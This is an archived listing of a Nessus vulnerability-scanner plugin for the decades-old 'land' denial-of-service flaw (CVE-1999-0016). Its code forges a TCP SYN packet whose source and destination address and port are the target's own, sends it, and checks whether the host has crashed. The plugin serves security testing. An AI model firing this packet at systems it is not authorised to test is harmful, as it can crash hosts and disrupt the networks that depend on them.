home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / land.nasl < prev    next >
Encoding:
Text File  |  2005-01-14  |  2.7 KB  |  111 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10133);
  10.  script_bugtraq_id(2666);
  11.  script_version ("$Revision: 1.17 $");
  12.  script_cve_id("CVE-1999-0016");
  13.  name["english"] = "Land";
  14.  name["francais"] = "Land";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "It was possible to make the remote server crash
  18. using the 'land' attack. 
  19.  
  20. An attacker may use this flaw to shut down this server, thus 
  21. preventing your network from working properly.
  22.  
  23. Solution : contact your operating
  24. system vendor for a patch.
  25.  
  26. Risk factor : High";
  27.  
  28.  
  29.  desc["francais"] = "Il s'est avΘrΘ
  30. possible de faire planter la 
  31. machine distante en utilisant
  32. l'attaque 'land'. 
  33.  
  34. Un pirate peut utiliser cette
  35. attaque pour empecher votre
  36. rΘseau de fonctionner normallement.
  37.  
  38. Solution : contactez le vendeur
  39. de votre OS pour un patch.
  40.  
  41. Facteur de risque : ElevΘ";
  42.  
  43.  script_description(english:desc["english"], francais:desc["francais"]);
  44.  
  45.  summary["english"] = "Crashes the remote host using the 'land' attack";
  46.  summary["francais"] = "Plante le serveur distant en utilisant l'attaque 'land'";
  47.  script_summary(english:summary["english"], francais:summary["francais"]);
  48.  
  49.  script_category(ACT_KILL_HOST);
  50.  
  51.  
  52.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  53.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  54.  family["english"] = "Denial of Service";
  55.  family["francais"] = "DΘni de service";
  56.  script_family(english:family["english"], francais:family["francais"]);
  57.  
  58.  
  59.  exit(0);
  60. }
  61.  
  62. #
  63. # The script code starts here
  64. #
  65.  
  66. addr = get_host_ip();
  67. ip = forge_ip_packet(   ip_v : 4,
  68.             ip_hl : 5,
  69.             ip_tos : 0,
  70.             ip_len : 20,
  71.                 ip_id : 0xF1C,
  72.             ip_p : IPPROTO_TCP,
  73.             ip_ttl : 255,
  74.                 ip_off : 0,
  75.             ip_src : addr);
  76. port = get_host_open_port();
  77. if(!port)exit(0);
  78.  
  79. # According to
  80. #  From: "Seeker of Truth" <seeker_sojourn@hotmail.com>
  81. #  To: bugtraq@securityfocus.com
  82. #  Subject: Fore/Marconi ATM Switch 'land' vulnerability
  83. #  Date: Fri, 14 Jun 2002 23:35:41 +0000
  84. #  Message-ID: <F16103xv3Ho8Xu1njpu00003202@hotmail.com>
  85. # Fore/Marconi ATM Switch FT6.1.1 and FT7.0.1 are vulnerable to a land
  86. # attack against port 23.
  87.  
  88. tcpip = forge_tcp_packet(    ip          : ip,
  89.                  th_sport : port,    
  90.                  th_dport : port,   
  91.                  th_flags : TH_SYN,
  92.                      th_seq   : 0xF1C,
  93.                  th_ack   : 0,
  94.                  th_x2    : 0,
  95.                   th_off   : 5,     
  96.                  th_win   : 2048, 
  97.                  th_urp   : 0);
  98.  
  99. #
  100. # Ready to go...
  101. #
  102.              
  103. start_denial();
  104. send_packet(tcpip, pcap_active:FALSE);
  105. sleep(5);
  106. alive = end_denial();
  107. if(!alive){
  108.         set_kb_item(name:"Host/dead", value:TRUE);
  109.         security_hole(0);
  110.         }
  111.